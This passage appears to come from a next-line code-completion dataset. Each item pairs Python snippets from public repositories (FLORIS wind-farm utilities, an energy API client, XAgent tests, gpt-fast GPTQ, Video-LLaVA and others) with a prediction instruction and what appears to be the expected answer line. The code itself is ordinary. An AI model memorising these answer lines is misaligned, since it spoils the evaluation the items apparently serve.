wf_model.n_turbs = len(wf_model.interface.get_turbine_layout()[0])
# Keep old yaw angles only if the number of turbines is the same
if len(yaw_temp) == len(layout_x):
fi.calculate_wake(yaw_angles=np.array([[yaw_temp]]))
# Path: deasc/utils_floris.py
def floris_farm_eval(wf_model, yaw, ws, wd, ti, shear):
"""
Calculate wind farm power and wind turbine powers given an
atmospheric and yaw condition. The farm layout is unchanged, and information
such as yaw angles is preserved even if not explicitly specified.
"""
# Extract FLORIS interface object
fi = wf_model.interface
# Start floris farm computational time
start = time.time()
# Get yaw angles before reinitializing - set to 0 when reinitializing flow
yaw = fi.floris.farm.yaw_angles[0][0] if yaw is None else yaw
# Get wd and ws as None is not an option in reinitialize flow
ws = fi.floris.flow_field.wind_speeds[0] if ws is None else ws
wd = fi.floris.flow_field.wind_directions[0] if wd is None else wd
# Error if yaw angles don't match turbine number
if len(yaw) != len(fi.floris.farm.yaw_angles[0][0]):
err_msg = "Yaw prescribed not matching turbine number"
raise Exception(err_msg)
# Reinitialize flow field and set previous yaw angles
fi.reinitialize(wind_speeds=[ws],
wind_directions=[wd],
turbulence_intensity=ti,
wind_shear=shear)
yaw = np.array([float(item) for item in yaw])
fi.calculate_wake(yaw_angles=np.array([[yaw]]))
# Calculate wf power, wt powers, wt turbulence intensities, wt yaw angles
wf_pow = (fi.get_farm_power()*10**(-6))[0][0]
wt_pow = (np.array(fi.get_turbine_powers())*10**(-6))[0][0]
wt_ti = (fi.get_turbine_TIs())[0][0]
wt_yaw = np.array(fi.floris.farm.yaw_angles[0][0])
# Report CPU time
cpu_time = time.time()-start
return (wf_pow, wt_pow, wt_ti, wt_yaw, cpu_time)
# Path: deasc/wf_model.py
import warnings
import numpy as np
from .utils_floris import (
floris_input_handler,
floris_properties,
floris_current_yaw,
floris_reinitialise_layout,
floris_farm_eval
)
# Copyright 2023 Filippo Gori
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
class WfModel:
"""
Class for wind farm modelling (Interface setup but not limited to FLORIS
framework).
"""
def __init__(self, input_file, path):
"""
Initialise wind farm object by pointing towards an input file.
(FLORIS interface object).
Args
----
input file:(FLORIS .json input file).
"""
# Read and initialize input file
self.input_file = input_file
self.interface = floris_input_handler(self.input_file, path)
# Assign wind farm model properties
| self.D, self.H_hub, self.n_turbs = floris_properties(self) |
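A hypothetical usage sketch of the class above; the input file name and path are invented, and the floris package plus a real FLORIS input file are required for this to actually run.

from deasc.wf_model import WfModel

wf_model = WfModel(input_file="gch_input.yaml", path="./inputs/")  # made-up names
print(wf_model.n_turbs, wf_model.D, wf_model.H_hub)  # turbine count, rotor diameter, hub height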
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: CPES-Power-and-Energy-Systems/interoperable-recommender-tso
# Path: energy_app/src/energy_app_client/Endpoint.py
class Endpoint:
# Path: energy_app/src/energy_app_client/RequestController.py
class RequestController:
"""
Manages api calls to remote endpoint using Python *requests* package
"""
def __init__(self):
self.retries = settings.ENERGYAPP["n_retries"]
self.remote_host = settings.ENERGYAPP["host"]
self.remote_port = settings.ENERGYAPP["port"]
self.remote_uri = f"http://{self.remote_host}:{self.remote_port}"
self.headers = {
'content-type': 'application/json'
}
# note the endpoint is forced to follow the standard Endpoint class
def request(self,
endpoint: Endpoint,
data=None,
params=None,
url_params=None,
auth_token=None) -> Response:
"""
:param endpoint:
:param data:
:param params:
:param url_params:
:param auth_token:
:return:
"""
url = self.remote_uri + endpoint.uri
if url_params is not None:
if url[-1] != "/":
url += "/"
for p in url_params:
url += f"{p}"
logger.debug(f"[{endpoint.http_method}]Request to: {url}")
data = None if data is None else json.dumps(data)
headers_ = dict(self.headers)  # copy so the shared default headers are not mutated per request
if auth_token:
headers_['Authorization'] = f'Bearer {auth_token}'
try:
response = self.__requests_retry_session().request(
method=endpoint.http_method,
url=url,
data=data,
params=params,
headers=headers_
)
except (requests.HTTPError, requests.exceptions.ConnectionError,
requests.exceptions.InvalidURL) as e:
raise e
return response
def __requests_retry_session(self,
back_off_factor=0.3,
status_force_list=(500, 502, 504),
session=None
):
"""
https://www.peterbe.com/plog/best-practice-with-retries-with-requests
:param back_off_factor:
:param status_force_list:
:param session:
:return:
"""
session = session or requests.Session()
retry = Retry(
total=self.retries,
read=self.retries,
connect=self.retries,
backoff_factor=back_off_factor,
status_forcelist=status_force_list,
)
adapter = HTTPAdapter(max_retries=retry)
session.mount('http://', adapter)
session.mount('https://', adapter)
return session
# Path: energy_app/src/energy_app_client/exception/APIException.py
class LoginException(Exception):
def __init__(self, message, errors):
# Call the base class constructor with the parameters it needs
super().__init__(message)
# Now for your custom code...
self.errors = errors
# Path: energy_app/src/energy_app_client/exception/APIException.py
class PostActionsException(Exception):
def __init__(self, message, errors):
# Call the base class constructor with the parameters it needs
super().__init__(message)
# Now for your custom code...
self.errors = errors
# Path: energy_app/src/energy_app_client/Controller.py
from time import time
from loguru import logger
from http import HTTPStatus
from .Endpoint import Endpoint, post_actions
from .RequestController import RequestController
from .exception import LoginException, PostActionsException
class Controller(RequestController):
def __init__(self):
RequestController.__init__(self)
self.access_token = ""
def __check_if_token_exists(self):
if self.access_token is None:
e_msg = "Access token is not yet available. Login first."
logger.error(e_msg)
raise ValueError(e_msg)
def set_access_token(self, token):
self.access_token = token
def login(self, email: str, password: str):
raise NotImplementedError("Method not implemented.")
def __request_template(self,
| endpoint_cls: Endpoint, |
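The retry/back-off pattern in __requests_retry_session above is reusable on its own; this stand-alone sketch mirrors it with the same urllib3/requests calls (the default values here are illustrative).

import requests
from requests.adapters import HTTPAdapter
from urllib3.util.retry import Retry

def retry_session(retries: int = 3, back_off_factor: float = 0.3) -> requests.Session:
    # Build a session that retries idempotent requests on 500/502/504,
    # backing off exponentially between attempts.
    session = requests.Session()
    retry = Retry(
        total=retries,
        read=retries,
        connect=retries,
        backoff_factor=back_off_factor,
        status_forcelist=(500, 502, 504),
    )
    adapter = HTTPAdapter(max_retries=retry)
    session.mount("http://", adapter)
    session.mount("https://", adapter)
    return session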
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: PlaxtonFlarion/NexaFlow
# Path: nexaflow/toolbox.py
def video_capture(video_path: str):
def video_jump(video_cap: cv2.VideoCapture, frame_id: int):
def compare_ssim(pic1: np.ndarray, pic2: np.ndarray) -> float:
def multi_compare_ssim(
pic1_list: typing.List, pic2_list: typing.List, hooks: typing.List = None
) -> typing.List[float]:
def get_current_frame_id(video_cap: cv2.VideoCapture) -> int:
def get_current_frame_time(video_cap: cv2.VideoCapture) -> float:
def imread(img_path: str, *_, **__) -> np.ndarray:
def get_frame_time(
video_cap: cv2.VideoCapture, frame_id: int, recover: bool = None
) -> float:
def get_frame_count(video_cap: cv2.VideoCapture) -> int:
def get_frame_size(video_cap: cv2.VideoCapture) -> typing.Tuple[int, int]:
def get_frame(
video_cap: cv2.VideoCapture, frame_id: int, recover: bool = None
) -> np.ndarray:
def turn_grey(old: np.ndarray) -> np.ndarray:
def turn_binary(old: np.ndarray) -> np.ndarray:
def turn_hog_desc(old: np.ndarray) -> np.ndarray:
def turn_lbp_desc(old: np.ndarray, radius: int = None) -> np.ndarray:
def turn_blur(old: np.ndarray) -> np.ndarray:
def sharpen_frame(old: np.ndarray) -> np.ndarray:
def calc_mse(pic1: np.ndarray, pic2: np.ndarray) -> float:
def calc_psnr(pic1: np.ndarray, pic2: np.ndarray) -> float:
def compress_frame(
old: np.ndarray,
compress_rate: float = None,
target_size: typing.Tuple[int, int] = None,
not_grey: bool = None,
interpolation: int = None,
*_,
**__,
) -> np.ndarray:
def get_timestamp_str() -> str:
def np2b64str(frame: np.ndarray) -> str:
def fps_convert(
target_fps: int, source_path: str, target_path: str, ffmpeg_exe: str = None
) -> int:
def match_template_with_object(
template: np.ndarray,
target: np.ndarray,
engine_template_cv_method_name: str = None,
**kwargs,
) -> typing.Dict[str, typing.Any]:
def match_template_with_path(
template: str, target: np.ndarray, **kwargs
) -> typing.Dict[str, typing.Any]:
def show_progress(total: int, color: int, title: str) -> tqdm:
def draw_line(image_path: str, save_path: str = None):
# Path: nexaflow/video.py
class VideoFrame(Frame):
def __init__(self, frame_id: int, timestamp: float, data: np.ndarray):
super().__init__(frame_id, timestamp, data)
def __str__(self):
return f"<VideoFrame id={self.frame_id} timestamp={self.timestamp}>"
@staticmethod
def initial(cap: cv2.VideoCapture, frame: np.ndarray) -> "VideoFrame":
frame_id = toolbox.get_current_frame_id(cap)
timestamp = toolbox.get_current_frame_time(cap)
new_frame = toolbox.compress_frame(frame, 0.5, (350, 700), False)
return VideoFrame(frame_id, timestamp, new_frame)
def copy(self) -> "VideoFrame":
return VideoFrame(self.frame_id, self.timestamp, self.data[:])
def contain_image(
self, *, image_path: str = None, image_object: np.ndarray = None, **kwargs
) -> typing.Dict[str, typing.Any]:
"""
Check whether the given image (passed as a path or a numpy object) appears in the current frame, and return the match result as a dictionary
"""
assert image_path or (
image_object is not None
), "should fill image_path or image_object"
if image_path:
logger.debug(f"found image path, use it first: {image_path}")
return toolbox.match_template_with_path(image_path, self.data, **kwargs)
image_object = toolbox.turn_grey(image_object)
return toolbox.match_template_with_object(image_object, self.data, **kwargs)
# Path: nexaflow/hook.py
import os
import cv2
import typing
from loguru import logger
from nexaflow import toolbox
from nexaflow.video import VideoFrame
class BaseHook(object):
def __init__(self, *_, **__):
# logger.debug(f"start initialing: {self.__class__.__name__} ...")
logger.info(f"加载视频帧处理单元: Frame Processor {self.__class__.__name__} ...")
self.result = dict()
def do(self, frame: VideoFrame, *_, **__) -> typing.Optional[VideoFrame]:
# info = f"execute hook: {self.__class__.__name__}"
frame_id = frame.frame_id
if frame_id != -1:
# logger.debug(f"{info}, frame id: {frame_id}")
pass
return frame
class ExampleHook(BaseHook):
def __init__(self, *_, **__):
super().__init__(*_, **__)
def do(self, frame: VideoFrame, *_, **__) -> typing.Optional[VideoFrame]:
super().do(frame, *_, **__)
| frame.data = toolbox.turn_grey(frame.data) |
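A hypothetical extra hook in the same shape as ExampleHook above; BaseHook and the frame type are reduced to minimal stand-ins so the sketch runs by itself, and the crop box is invented.

import numpy as np

class BaseHook:                      # minimal stand-in for nexaflow.hook.BaseHook
    def do(self, frame, *_, **__):
        return frame

class Frame:                         # minimal stand-in for VideoFrame
    def __init__(self, data):
        self.data = data

class CropHook(BaseHook):
    def do(self, frame, *_, **__):
        frame = super().do(frame, *_, **__)
        frame.data = frame.data[0:350, 0:350]  # keep only the top-left region
        return frame

frame = Frame(np.zeros((700, 350, 3), dtype=np.uint8))
print(CropHook().do(frame).data.shape)  # (350, 350, 3)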
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: OpenBMB/XAgent
# Path: run.py
def parse_args() -> argparse.Namespace:
"""
Parse the command line arguments and return them as an argparse.Namespace object.
Returns:
argparse.Namespace: An object containing command line arguments and their values.
"""
parser = argparse.ArgumentParser()
parser.add_argument("--task", type=str, required=True, help="The task description.")
parser.add_argument("--upload-files", nargs='+', dest="upload_files", help="List of files to upload.")
parser.add_argument("--model", type=str, help="Model identifier for the task.")
parser.add_argument("--record-dir", type=str, dest="record_dir", help="Directory to record task execution logs.")
parser.add_argument("--mode", type=str, default="auto", help="Operational mode: 'auto' or 'manual'.")
parser.add_argument("--quiet", action="store_true", default=False, help="Run in quiet mode; minimal output.")
parser.add_argument("--max-subtask-chain-length", type=int, dest="max_subtask_chain_length",
help="Maximum length of subtask chain.")
parser.add_argument("--enable-ask-human-for-help", action="store_true", dest="enable_ask_human_for_help",
help="Flag to enable asking for human assistance.")
parser.add_argument("--max-plan-refine-chain-length", type=int, dest="max_plan_refine_chain_length",
help="Maximum length of plan refinement chain.")
parser.add_argument("--max-plan-tree-depth", type=int, dest="max_plan_tree_depth",
help="Maximum depth of the plan tree.")
parser.add_argument("--max-plan-tree-width", type=int, dest="max_plan_tree_width",
help="Maximum width of the plan tree.")
parser.add_argument("--max-retry-times", type=int, dest="max_retry_times", help="Maximum number of retry attempts.")
parser.add_argument("--config-file", type=str, default=os.getenv('CONFIG_FILE', 'assets/config.yml'),
dest="config_file", help="Path to the configuration file.")
return parser.parse_args()
# Path: run.py
def execute_command_line_process(args: argparse.Namespace, quiet_mode: bool = False) -> None:
"""
Execute the command line process based on the parsed arguments. If quiet mode is enabled,
redirect stdout to a file specified by the recorder's record_root_dir.
Args:
args (argparse.Namespace): Parsed command line arguments.
quiet_mode (bool): Whether to run in quiet mode, outputting to a file instead of the terminal.
"""
args_dict = vars(args)
for key, value in args_dict.items():
if value is not None:
if key == 'model':
ARGS['default_completion_kwargs'] = deepcopy(CONFIG['default_completion_kwargs'])
ARGS['default_completion_kwargs']['model'] = value
else:
ARGS[key] = value
# Redirect stdout to a file if quiet mode is true
if quiet_mode:
from XAgent.running_recorder import recorder
record_file_path = os.path.join(recorder.record_root_dir, "command_line.ansi")
with open(record_file_path, "w", encoding="utf-8") as file, redirect_stdout(file):
start_command_line(args_dict)
else:
start_command_line(args_dict)
# Path: run.py
def start_command_line(args_dict: dict) -> None:
"""
Start the command line interface with the provided arguments.
Args:
args_dict (dict): A dictionary of command line arguments.
"""
param = CommandLineParam(
task=args_dict['task'],
upload_files=args_dict.get('upload_files'),
role="Assistant",
mode=args_dict["mode"],
)
cmd = CommandLine(param)
cmd.start()
# Path: tests/test_run.py
import pytest
import sys
from run import parse_args, execute_command_line_process, start_command_line
from unittest.mock import patch
@pytest.fixture
def mock_argv(monkeypatch):
"""
A pytest fixture to mock the command line arguments.
It sets the sys.argv to mimic command line input for testing.
"""
test_args = ["--task", "example_task", "--upload-files", "file1", "file2", "--model", "model1"]
monkeypatch.setattr(sys, 'argv', ['test_script.py'] + test_args)
def test_parse_args(mock_argv):
"""
Test to ensure that the parse_args function correctly parses command line arguments.
"""
| args = parse_args() |
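The sys.argv monkeypatching used by the fixture above works with any argparse-based CLI; here is a self-contained pytest sketch (the script name and flag are invented, run it under pytest so the monkeypatch fixture is available).

import argparse
import sys

def parse_args():
    parser = argparse.ArgumentParser()
    parser.add_argument("--task", type=str, required=True)
    return parser.parse_args()

def test_parse_args(monkeypatch):
    # Replace the process argv so argparse sees our fake command line.
    monkeypatch.setattr(sys, "argv", ["prog", "--task", "example_task"])
    args = parse_args()
    assert args.task == "example_task"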
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: pytorch-labs/gpt-fast
# Path: eval.py
def setup_cache_padded_seq_input_pos_max_seq_length_for_prefill(
model: LLaMA,
prompt: torch.Tensor,
max_new_tokens: int,
max_seq_length: Optional[int] = None,
):
"""
Sets up model cache and does some bookkeeping calculations for prompt, input_pos and max_seq_length
that are needed for prefill or model_forward
Args:
model (LLaMA): The model whose cache gets set up
prompt (torch.Tensor): Tensor of shape (T) with indices of the prompt sequence.
max_new_tokens (int): The desired maximum number of new tokens that can be generated.
max_seq_length (Optional[int], optional): The maximum sequence length allowed.
Returns:
seq (torch.Tensor): prompt but padded with zeros to size max_seq_length
input_pos (torch.Tensor): tensor of integers in increasing order
max_seq_length (int): The maximum sequence length allowed, updated based on other numbers
"""
T = prompt.size(0)
T_new = T + max_new_tokens
if max_seq_length is None:
max_seq_length = min(T_new, model.config.block_size)
device, dtype = prompt.device, prompt.dtype
# create an empty tensor of the expected final shape and fill in the current tokens
empty = torch.empty(T_new, dtype=dtype, device=device)
empty[:T] = prompt
seq = empty
input_pos = torch.arange(0, T, device=device)
with torch.device(device):
model.setup_caches(max_batch_size=1, max_seq_length=max_seq_length)
return seq, input_pos, max_seq_length
# Path: generate.py
def encode_tokens(tokenizer, string, bos=True, device='cuda'):
tokens = tokenizer.encode(string)
if bos:
tokens = [tokenizer.bos_id()] + tokens
return torch.tensor(tokens, dtype=torch.int, device=device)
# Path: GPTQ.py
import os
import sys
import torch
import main as lm_evaluation_harness_main
import torch.fx as fx
import torch.nn as nn
import torch.nn.functional as F
import lm_eval
from torch.utils._pytree import tree_flatten, tree_unflatten
from eval import setup_cache_padded_seq_input_pos_max_seq_length_for_prefill
from generate import encode_tokens
aten = torch.ops.aten
try:
class InputRecorder(lm_eval.base.BaseLM):
"""
This is a fake evaluation wrapper that just records the inputs
so that they can be used in calibration.
If pad_calibration_inputs is enabled, the input recorder will take
each input and pad/truncate it down to the calibration_seq_length.
It will also edit the model embeddings to be zero for the 0 token used
in padding and avoid any inputs with the 0 token.
If not, it will only truncate inputs to the desired length.
"""
def __init__(
self,
model,
tokenizer,
calibration_seq_length,
pad_calibration_inputs=False,
):
super().__init__()
self._model = model
self._tokenizer = tokenizer
self._device = torch.device("cpu")
self.vocab_size = model.config.vocab_size
self.calibration_seq_length = calibration_seq_length
self.pad_calibration_inputs = pad_calibration_inputs
self.inputs = None
if self.pad_calibration_inputs:
# This is needed for the pad_calibration_inputs option
# to work properly, the 0 token's embeddings are set to 0 so that
# the padded inputs will not affect the model numerics. This token isn't used
# commonly in the eval tasks for the meta-llama tokenizer and we skip any inputs
# where it appears
try:
if isinstance(self._model.transformer.wte, nn.Embedding):
self._model.transformer.wte.weight.data[0, :] *= 0
except:
print(
"Did not find embeddings in model.transformer.wte, disabling padding"
)
self.pad_calibration_inputs = False
@property
def eot_token_id(self):
return self._tokenizer.eos_id()
@property
def max_length(self):
return self.calibration_seq_length
@property
def max_gen_toks(self):
return 50
@property
def batch_size(self):
return 1
@property
def device(self):
return self._device
def tok_encode(self, string: str):
encoded = encode_tokens(
self._tokenizer, string, bos=True, eos=False, device=self._device
)
# encoded is a pytorch tensor, but some internal logic in the
# eval harness expects it to be a list instead
# TODO: verify this for multi-batch as well
encoded = encoded.tolist()
return encoded
def tok_decode(self, tokens):
decoded = self._tokenizer.decode(tokens)
return decoded
def add_input(self, args):
if self.inputs is None:
self.inputs = [MultiInput([arg]) for arg in args]
else:
self.inputs = [
multi.add_input(arg) for (multi, arg) in zip(self.inputs, args)
]
def get_recorded_inputs(self):
return self.inputs
def _model_call(self, inps):
inps = inps.squeeze(0)
T = len(inps)
if (
# can't use inputs that are too short when padding disabled
(T < self.calibration_seq_length and not self.pad_calibration_inputs)
or
# can't use inputs that actually use token we use for padding
(self.pad_calibration_inputs and 0 in inps)
):
# give random output
return torch.randn(
(1, T, self.vocab_size), dtype=torch.bfloat16, device=self._device
)
# pad or truncate to the right size
if T >= self.calibration_seq_length:
inps = inps[: self.calibration_seq_length]
else:
inps = F.pad(inps, (0, self.calibration_seq_length - T))
max_new_tokens = 1
(
seq,
input_pos,
max_seq_length,
| ) = setup_cache_padded_seq_input_pos_max_seq_length_for_prefill( |
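The pad-or-truncate step in _model_call above is easy to check in isolation; this toy sketch uses the same F.pad call (the lengths are invented).

import torch
import torch.nn.functional as F

calibration_seq_length = 8
inps = torch.arange(1, 6, dtype=torch.int64)  # length-5 toy input
T = len(inps)
if T >= calibration_seq_length:
    inps = inps[:calibration_seq_length]      # truncate to the target length
else:
    inps = F.pad(inps, (0, calibration_seq_length - T))  # right-pad with zeros
print(inps)  # tensor([1, 2, 3, 4, 5, 0, 0, 0])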
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: deepseek-ai/DeepSeek-Coder
# Path: Evaluation/MBPP/human_eval/data.py
HUMAN_EVAL = os.path.join(ROOT, "..", "data", "HumanEval.jsonl.gz")
# Path: Evaluation/MBPP/human_eval/evaluation.py
def evaluate_functional_correctness(
input_file: str = None,
tmp_dir: str = "./",
n_workers: int = 32,
timeout: float = 10.0,
problem_file: str = "../data/humaneval_python.jsonl.gz",
out_dir: str = None,
k: List[int] = [1, 10, 100],
test_groundtruth: bool = False,
example_test: bool = False,
is_mbpp: bool = False,
language: str = "python",
):
"""
Evaluates the functional correctness of a model.
"""
if example_test:
print("Example test...")
problems = read_dataset(problem_file,
dataset_type="humaneval")
sample_jsonl = stream_jsonl_all(input_file)
with ThreadPoolExecutor(max_workers=n_workers) as executor:
futures = []
completion_id = Counter()
n_samples = 0
results = defaultdict(list)
if test_groundtruth:
print("Testing ground truth...")
for sample in tqdm(problems.values()):
task_id = sample["task_id"]
lang = task_id.split("/")[0].lower()
if lang == "javascript":
lang = "js"
tmp_dir_ = os.path.join(tmp_dir, lang, "evaluation")
sample["generation"] = sample["canonical_solution"]
sample["test_code"] = process_humaneval_test(sample, problems, example_test, language)
if sample["test_code"] is None:
continue
args = (task_id, sample, lang, timeout, tmp_dir_, completion_id[task_id])
future = executor.submit(check_correctness, *args)
futures.append(future)
completion_id[task_id] += 1
n_samples += 1
else:
print("Reading samples...")
for sample in tqdm(sample_jsonl):
task_id = sample["task_id"]
if not is_mbpp:
lang = language
if not is_mbpp and lang == "javascript":
lang = "js"
if is_mbpp:
lang = "python"
tmp_dir_ = os.path.join(tmp_dir, lang, "evaluation")
sample["task_id"] = task_id
sample["test_code"] = process_humaneval_test(sample, problems, example_test, is_mbpp, language)
if sample["test_code"] is None:
continue
if "completion_id" in sample:
completion_id_ = sample["completion_id"]
else:
completion_id_ = completion_id[task_id]
args = (task_id, sample, lang, timeout, tmp_dir_, completion_id_)
future = executor.submit(check_correctness, *args)
futures.append(future)
completion_id[task_id] += 1
n_samples += 1
if len(completion_id) == len(problems):
evaluate_pass_at_k = True
else:
evaluate_pass_at_k = False
print("Running test suites...")
for future in tqdm(as_completed(futures), total=len(futures)):
result = future.result()
results[result["task_id"]].append((result["completion_id"], result))
# Calculate pass@k.
total, correct = [], []
for result in results.values():
passed = [r[1]["passed"] for r in result]
total.append(len(passed))
correct.append(sum(passed))
total = np.array(total)
correct = np.array(correct)
if evaluate_pass_at_k:
ks = k
pass_at_k = {f"pass@{k}": estimate_pass_at_k(total, correct, k).mean()
for k in ks if (total >= k).all()}
print(pass_at_k)
else:
print("Total:", np.sum(total))
print("Correct:", np.sum(correct))
return pass_at_k
# Path: Evaluation/MBPP/human_eval/evaluate_functional_correctness.py
import fire
import sys
from .data import HUMAN_EVAL
from .evaluation import evaluate_functional_correctness
def entry_point(
sample_file: str,
k: str = "1,10,100",
n_workers: int = 4,
timeout: float = 3.0,
problem_file: str = "",
is_mbpp: bool = False,
):
"""
Evaluates the functional correctness of generated samples, and writes
results to f"{sample_file}_results.jsonl.gz"
"""
k = list(map(int, k.split(",")))
| results = evaluate_functional_correctness(sample_file, k, n_workers, timeout, problem_file, is_mbpp) |
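estimate_pass_at_k itself is not shown in the snippet above; the standard unbiased estimator from the Codex paper — pass@k = 1 - C(n-c, k) / C(n, k), computed stably as a running product — is presumably what it implements, and a stand-alone version looks like this.

import numpy as np

def estimate_pass_at_k(num_samples, num_correct, k):
    def estimator(n, c, k):
        # Probability that at least one of k sampled completions passes.
        if n - c < k:
            return 1.0
        return 1.0 - np.prod(1.0 - k / np.arange(n - c + 1, n + 1))
    return np.array([estimator(int(n), int(c), k)
                     for n, c in zip(num_samples, num_correct)])

print(estimate_pass_at_k(np.array([10]), np.array([3]), 1))  # ≈ [0.3]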
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: PKU-YuanGroup/Video-LLaVA
# Path: llava/model/multimodal_encoder/builder.py
def build_image_tower(image_tower_cfg, **kwargs):
image_tower = getattr(image_tower_cfg, 'mm_image_tower', getattr(image_tower_cfg, 'image_tower', None))
is_absolute_path_exists = os.path.exists(image_tower)
if is_absolute_path_exists or image_tower.startswith("openai") or image_tower.startswith("laion"):
return CLIPVisionTower(image_tower, args=image_tower_cfg, **kwargs)
if image_tower.endswith('LanguageBind_Image'):
return LanguageBindImageTower(image_tower, args=image_tower_cfg, cache_dir='./cache_dir', **kwargs)
if 'mae' in image_tower:
print('maemaemaemaemaemaemaemae')
print('maemaemaemaemaemaemaemae')
print('maemaemaemaemaemaemaemae')
print('maemaemaemaemaemaemaemae')
print('maemaemaemaemaemaemaemae')
return MAEVisionTower(image_tower, args=image_tower_cfg, cache_dir='./cache_dir', **kwargs)
raise ValueError(f'Unknown image tower: {image_tower}')
# Path: llava/model/multimodal_encoder/builder.py
def build_video_tower(video_tower_cfg, **kwargs):
video_tower = getattr(video_tower_cfg, 'mm_video_tower', getattr(video_tower_cfg, 'video_tower', None))
if video_tower.endswith('LanguageBind_Video_merge'):
return LanguageBindVideoTower(video_tower, args=video_tower_cfg, cache_dir='./cache_dir', **kwargs)
raise ValueError(f'Unknown video tower: {video_tower}')
# Path: llava/model/multimodal_projector/builder.py
def build_vision_projector(config, delay_load=False, **kwargs):
projector_type = getattr(config, 'mm_projector_type', 'linear')
if projector_type == 'linear':
return nn.Linear(config.mm_hidden_size, config.hidden_size)
elif projector_type == 'identity':
return IdentityMap()
elif projector_type.startswith('qformer'): # qformer2_64
qformer_config = qformer_config_template(config, projector_type)
return Blip2Model(qformer_config)
else:
mlp_gelu_match = re.match(r'^mlp(\d+)x_gelu$', projector_type)
if mlp_gelu_match:
mlp_depth = int(mlp_gelu_match.group(1))
modules = [nn.Linear(config.mm_hidden_size, config.hidden_size)]
for _ in range(1, mlp_depth):
modules.append(nn.GELU())
modules.append(nn.Linear(config.hidden_size, config.hidden_size))
return nn.Sequential(*modules)
raise ValueError(f'Unknown projector type: {projector_type}')
# Path: llava/constants.py
IGNORE_INDEX = -100
# Path: llava/constants.py
X_TOKEN_INDEX = {'IMAGE': -200, 'VIDEO': -201, 'AUDIO': -202, 'THERMAL': -203, 'DEPTH': -204}
# Path: llava/constants.py
DEFAULT_X_PATCH_TOKEN = {'IMAGE': "<im_patch>", 'VIDEO': "<vi_patch>", 'AUDIO': "<au_patch>", 'THERMAL': "<th_patch>", 'DEPTH': "<de_patch>"}
# Path: llava/constants.py
DEFAULT_X_START_TOKEN = {'IMAGE': "<im_start>", 'VIDEO': "<vi_start>", 'AUDIO': "<au_start>", 'THERMAL': "<th_start>", 'DEPTH': "<de_start>"}
# Path: llava/constants.py
DEFAULT_X_END_TOKEN = {'IMAGE': "<im_end>", 'VIDEO': "<vi_end>", 'AUDIO': "<au_end>", 'THERMAL': "<th_end>", 'DEPTH': "<de_end>"}
# Path: llava/model/llava_arch.py
from abc import ABC, abstractmethod
from .multimodal_encoder.builder import build_image_tower, build_video_tower
from .multimodal_projector.builder import build_vision_projector
from llava.constants import IGNORE_INDEX, X_TOKEN_INDEX, DEFAULT_X_PATCH_TOKEN, DEFAULT_X_START_TOKEN, DEFAULT_X_END_TOKEN
import torch
import torch.nn as nn
# Copyright 2023 Haotian Liu
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class LlavaMetaModel:
def __init__(self, config):
super(LlavaMetaModel, self).__init__(config)
if hasattr(config, "mm_image_tower"):
self.image_tower = build_image_tower(config, delay_load=True)
| self.mm_projector = build_vision_projector(config) |
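The mlp{N}x_gelu branch of build_vision_projector above can be exercised on its own; the hidden sizes below are toy values chosen for illustration.

import re
import torch.nn as nn

projector_type = "mlp2x_gelu"
mm_hidden_size, hidden_size = 1024, 4096

match = re.match(r"^mlp(\d+)x_gelu$", projector_type)
mlp_depth = int(match.group(1))
modules = [nn.Linear(mm_hidden_size, hidden_size)]
for _ in range(1, mlp_depth):
    modules.append(nn.GELU())
    modules.append(nn.Linear(hidden_size, hidden_size))
projector = nn.Sequential(*modules)
print(projector)  # Linear -> GELU -> Linear for depth 2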
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: deepseek-ai/DreamCraft3D
# Path: extern/ldm_zero123/models/diffusion/sampling_util.py
def norm_thresholding(x0, value):
s = append_dims(x0.pow(2).flatten(1).mean(1).sqrt().clamp(min=value), x0.ndim)
return x0 * (value / s)
# Path: extern/ldm_zero123/models/diffusion/sampling_util.py
def renorm_thresholding(x0, value):
# renorm
pred_max = x0.max()
pred_min = x0.min()
pred_x0 = (x0 - pred_min) / (pred_max - pred_min) # 0 ... 1
pred_x0 = 2 * pred_x0 - 1.0 # -1 ... 1
s = torch.quantile(rearrange(pred_x0, "b ... -> b (...)").abs(), value, dim=-1)
s.clamp_(min=1.0)
s = s.view(-1, *((1,) * (pred_x0.ndim - 1)))
# clip by threshold
# pred_x0 = pred_x0.clamp(-s, s) / s # needs newer pytorch # TODO bring back to pure-gpu with min/max
# temporary hack: numpy on cpu
pred_x0 = (
np.clip(pred_x0.cpu().numpy(), -s.cpu().numpy(), s.cpu().numpy())
/ s.cpu().numpy()
)
pred_x0 = torch.tensor(pred_x0).to(x0.device)
# re.renorm
pred_x0 = (pred_x0 + 1.0) / 2.0 # 0 ... 1
